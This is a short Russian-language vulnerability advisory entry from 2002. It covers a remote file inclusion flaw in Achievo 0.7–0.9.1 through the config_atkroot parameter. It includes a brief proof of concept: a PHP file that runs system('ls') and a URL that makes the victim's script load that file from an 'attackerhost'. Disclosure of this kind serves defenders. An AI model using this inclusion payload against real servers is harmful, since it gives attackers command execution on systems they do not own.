Дата публикации: | 27.08.2002 |
Всего просмотров: | 1081 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Achieva (http://www.achievo.org/) включает PHP сценарий, который используется для генерации JavaScript (class.atkdateattribute.js.php). Этот сценарий использует множество PHP include_once() инструкций, чтобы вызвать код, содержащийся в функциональных библиотеках. Нападающие могут изменять переменную $config_atkroot, которая определяет местоположение внешних файлов, и определять произвольное местоположение, типа PHP сценария на удаленном хосте. Успешная эксплуатация уязвимости позволяет удаленному атакующему выполнять команды с привилегиями процесса Web сервера. Пример: 1. Создаем файл ls.txt и сохраняем его на своем Web сервере: <?php system('ls'); ?>2. Вызываем уязвимый сценарий: http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? Уязвимость обнаружена в Achieva 0.7-0.9.1 |
Ссылки: | Arbitrary code execution problem in Achievo |